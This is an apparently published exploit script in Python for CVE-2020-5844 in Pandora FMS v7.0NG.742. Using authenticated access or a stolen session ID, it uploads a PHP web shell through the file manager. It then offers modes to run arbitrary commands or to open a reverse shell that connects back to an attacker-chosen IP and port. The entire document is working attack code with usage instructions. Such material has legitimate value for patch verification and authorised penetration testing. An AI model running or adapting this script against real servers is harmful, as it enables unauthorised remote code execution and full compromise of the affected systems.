Pandora FMS 7.0NG.742 Remote Code Execution

# Exploit Title: Pandora FMS v7.0NG.742 - Remote Code Execution (RCE) (Authenticated)# Date: 05/20/2022# Exploit Author: UNICORD (NicPWNs & Dev-Yeoj)# Vendor Homepage: https://pandorafms.com/# Software Link: https://sourceforge.net/projects/pandora/files/Pandora%20FMS%207.0NG/742_FIX_PERL2020/Tarball/pandorafms_server-7.0NG.742_FIX_PERL2020.tar.gz# Version: v7.0NG.742# Tested on: Pandora FMS v7.0NG.742 (Ubuntu)# CVE: CVE-2020-5844# Source: https://github.com/UNICORDev/exploit-CVE-2020-5844# Description: index.php?sec=godmode/extensions&sec2=extensions/files_repo in Pandora FMS v7.0 NG allows authenticated administrators to upload malicious PHP scripts, and execute them via base64 decoding of the file location. This affects v7.0NG.742_FIX_PERL2020.#!/usr/bin/env python3# Importstry:    import requestsexcept:    print(f"ERRORED: RUN: pip install requests")    exit()import sysimport timeimport urllib.parse# Class for colorsclass color:    red = '\033[91m'    gold = '\033[93m'    blue = '\033[36m'    green = '\033[92m'    no = '\033[0m'# Print UNICORD ASCII Artdef UNICORD_ASCII():    print(rf"""{color.red}        _ __,~~~{color.gold}/{color.red}_{color.no}        {color.blue}__  ___  _______________  ___  ___{color.no}{color.red}    ,~~`( )_( )-\|       {color.blue}/ / / / |/ /  _/ ___/ __ \/ _ \/ _ \{color.no}{color.red}        |/|  `--.       {color.blue}/ /_/ /    // // /__/ /_/ / , _/ // /{color.no}{color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no}    """)# Print exploit help menudef help():    print(r"""UNICORD Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code ExecutionUsage:  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]  python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]  python3 exploit-CVE-2020-5844.py -hOptions:  -t    Target host and port. Provide target IP address and port.  -u    Target username and password. Provide username and password to log in to Pandora FMS.  -p    Target valid PHP session ID. No username or password needed. (Optional)  -s    Reverse shell mode. Provide local IP address and port. (Optional)  -c    Custom command mode. Provide command to execute. (Optional)  -w    Web shell custom mode. Provide custom PHP file name. (Optional)  -h    Show this help menu.""")    exit()# Pretty loading wheeldef loading(spins):    def spinning_cursor():        while True:            for cursor in '|/-\\':                yield cursor    spinner = spinning_cursor()    for _ in range(spins):        sys.stdout.write(next(spinner))        sys.stdout.flush()        time.sleep(0.1)        sys.stdout.write('\b')# Run the exploitdef exploit(exploitMode, targetSess):    UNICORD_ASCII()    # Print initial variables    print(f"{color.blue}UNICORD: {color.red}Exploit for CVE-2020-5844 (Pandora FMS v7.0NG.742) - Remote Code Execution{color.no}")    print(f"{color.blue}OPTIONS: {color.gold}{modes[exploitMode]}{color.no}")    if targetSess is not None:        print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")    elif targetUser is not None:        print(f"{color.blue}USERNAME: {color.gold}{targetUser}{color.no}")        print(f"{color.blue}PASSWORD: {color.gold}{targetPass}{color.no}")    if exploitMode == "command":        print(f"{color.blue}COMMAND: {color.gold}{command}{color.no}")    if exploitMode == "web":        print(f"{color.blue}WEBFILE: {color.gold}{webName}{color.no}")    if exploitMode == "shell":        print(f"{color.blue}LOCALIP: {color.gold}{localIP}:{localPort}{color.no}")        print(f"{color.blue}WARNING: {color.gold}Be sure to start a local listener on the above IP and port.{color.no}")    print(f"{color.blue}WEBSITE: {color.gold}http://{targetIP}:{targetPort}/pandora_console{color.no}")    loading(15)    # If a PHPSESSID is not provided, grab one with valid username and password    if targetSess is None:        try:            getSession = requests.post(f"http://{targetIP}:{targetPort}/pandora_console/index.php?login=1", data={"nick": targetUser, "pass": targetPass, "login_button": "login"})            targetSess = getSession.cookies.get('PHPSESSID')            print(f"{color.blue}PHPSESS: {color.gold}{targetSess}{color.no}")            if "login_move" in getSession.text:                print(f"{color.blue}ERRORED: {color.red}Invalid credentials!{color.no}")        except:            print(f"{color.blue}ERRORED: {color.red}Could not log in to website!{color.no}")            exit()    # Set headers, parameters, and cookies for post request    headers = {    'Host': f'{targetIP}',    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0',    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',    'Accept-Language': 'en-US,en;q=0.5',    'Accept-Encoding': 'gzip, deflate',    'Content-Type': 'multipart/form-data; boundary=---------------------------308045185511758964171231871874',    'Content-Length': '1289',    'Connection': 'close',    'Referer': f'http://{targetIP}:{targetPort}/pandora_console/index.php?sec=gsetup&sec2=godmode/setup/file_manager',    'Upgrade-Insecure-Requests': '1',    'Sec-Fetch-Dest': 'document',    'Sec-Fetch-Mode': 'navigate',    'Sec-Fetch-Site': 'same-origin',    'Sec-Fetch-User': '?1'    }    params = (        ('sec', 'gsetup'),        ('sec2', 'godmode/setup/file_manager')    )    cookies = {'PHPSESSID': targetSess}    # Basic PHP web shell with 'cmd' parameter    data = f'-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="file"; filename="{webName}"\r\nContent-Type: application/x-php\r\n\r\n<?php system($_GET[\'cmd\']);?>\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="umask"\r\n\r\n\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="decompress_sent"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="go"\r\n\r\nGo\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="real_directory"\r\n\r\n/var/www/pandora/pandora_console/images\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="directory"\r\n\r\nimages\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash"\r\n\r\n6427eed956c3b836eb0644629a183a9b\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="hash2"\r\n\r\n594175347dddf7a54cc03f6c6d0f04b4\r\n-----------------------------308045185511758964171231871874\r\nContent-Disposition: form-data; name="upload_file_or_zip"\r\n\r\n1\r\n-----------------------------308045185511758964171231871874--\r\n'    # Try to upload the PHP web shell to the server    try:        response = requests.post(f'http://{targetIP}:{targetPort}/pandora_console/index.php', headers=headers, params=params, cookies=cookies, data=data, verify=False)    except:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website!{color.no}")        exit()    statusCode=response.status_code    if statusCode == 200:        print(f"{color.blue}EXPLOIT: {color.gold}Connected to website! Status Code: {statusCode}{color.no}")    else:        print(f"{color.blue}ERRORED: {color.red}Could not connect to website! Status Code: {statusCode}{color.no}")        exit()    loading(15)    print(f"{color.blue}EXPLOIT: {color.gold}Logged into Pandora FMS!{color.no}")    loading(15)    # Print web shell location if in web shell mode    if exploitMode == "web":        print(f"{color.blue}EXPLOIT: {color.gold}Web shell uploaded!{color.no}")        print(f"{color.blue}SUCCESS: {color.green}Web shell available at: http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd=whoami {color.no}\n")    # Run custom command on web shell if in command mode    if exploitMode == "command":        response = requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(command)}')        print(f"{color.blue}SUCCESS: {color.green}Command executed! Printing response below:{color.no}\n")        print(response.text)    # Run reverse shell command if in reverse shell mode    if exploitMode == "shell":        shell = f"php -r \'$sock=fsockopen(\"{localIP}\",{localPort});exec(\"/bin/sh -i <&3 >&3 2>&3\");\'"        try:            requests.get(f'http://{targetIP}:{targetPort}/pandora_console/images/{webName}?cmd={urllib.parse.quote_plus(shell)}',timeout=1)            print(f"{color.blue}ERRORED: {color.red}Reverse shell could not connect! Make sure you have a local listener on {color.gold}{localIP}:{localPort}{color.no}\n")        except:            print(f"{color.blue}SUCCESS: {color.green}Reverse shell executed! Check your local listener on {color.gold}{localIP}:{localPort}{color.no}\n")    exit()if __name__ == "__main__":    args = ['-h','-t','-u','-p','-s','-c','-w']    modes = {'web':'Web Shell Mode','command':'Command Shell Mode','shell':'Reverse Shell Mode'}    # Initialize starting variables    targetIP = None    targetPort = None    targetUser = None    targetPass = None    targetSess = None    command = None    localIP = None    localPort = None    webName = "unicord.php" # Default web shell file name    exploitMode = "web" # Default to web shell mode    # Print help if specified or if a target or authentication is not provided    if args[0] in sys.argv or args[1] not in sys.argv or (args[2] not in sys.argv and args[3] not in sys.argv):        help()    # Collect target IP and port from CLI    if args[1] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 1]:                raise            targetIP = sys.argv[sys.argv.index(args[1]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[1]) + 2]:                raise            targetPort = sys.argv[sys.argv.index(args[1]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a target port! \"-t <target-IP> <target-port>\"{color.no}")            exit()    # Collect target username and password from  CLI    if args[2] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 1]:                raise            targetUser = sys.argv[sys.argv.index(args[2]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[2]) + 2]:                raise            targetPass = sys.argv[sys.argv.index(args[2]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a username and password! \"-u <username> <password>\"{color.no}")            exit()    # Collect PHPSESSID from CLI, if specified    if args[3] in sys.argv:        try:            if "-" in sys.argv[sys.argv.index(args[3]) + 1]:                raise            targetSess = sys.argv[sys.argv.index(args[3]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a valid PHPSESSID! \"-p <PHPSESSID>\"{color.no}")            exit()    # Set reverse shell mode from CLI, if specified    if args[4] in sys.argv:        exploitMode = "shell"        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 1]:                raise            localIP = sys.argv[sys.argv.index(args[4]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        try:            if "-" in sys.argv[sys.argv.index(args[4]) + 2]:                raise            localPort = sys.argv[sys.argv.index(args[4]) + 2]        except:            print(f"{color.blue}ERRORED: {color.red}Provide both a local IP address and port! \"-s <local-IP> <local-port>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set custom command mode from CLI, if specified    elif args[5] in sys.argv:        exploitMode = "command"        try:            if sys.argv[sys.argv.index(args[5]) + 1] in args:                raise            command = sys.argv[sys.argv.index(args[5]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom command! \"-c <command>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Set web shell mode from CLI, if specified    elif args[6] in sys.argv:        exploitMode = "web"        try:            if sys.argv[sys.argv.index(args[6]) + 1] in args:                raise            if ".php" not in sys.argv[sys.argv.index(args[6]) + 1]:                webName = sys.argv[sys.argv.index(args[6]) + 1] + ".php"            else:                webName = sys.argv[sys.argv.index(args[6]) + 1]        except:            print(f"{color.blue}ERRORED: {color.red}Provide a custom PHP file name! \"-c <name.php>\"{color.no}")            exit()        exploit(exploitMode,targetSess)    # Run with default web shell mode if no mode is specified    else:        exploit(exploitMode,targetSess)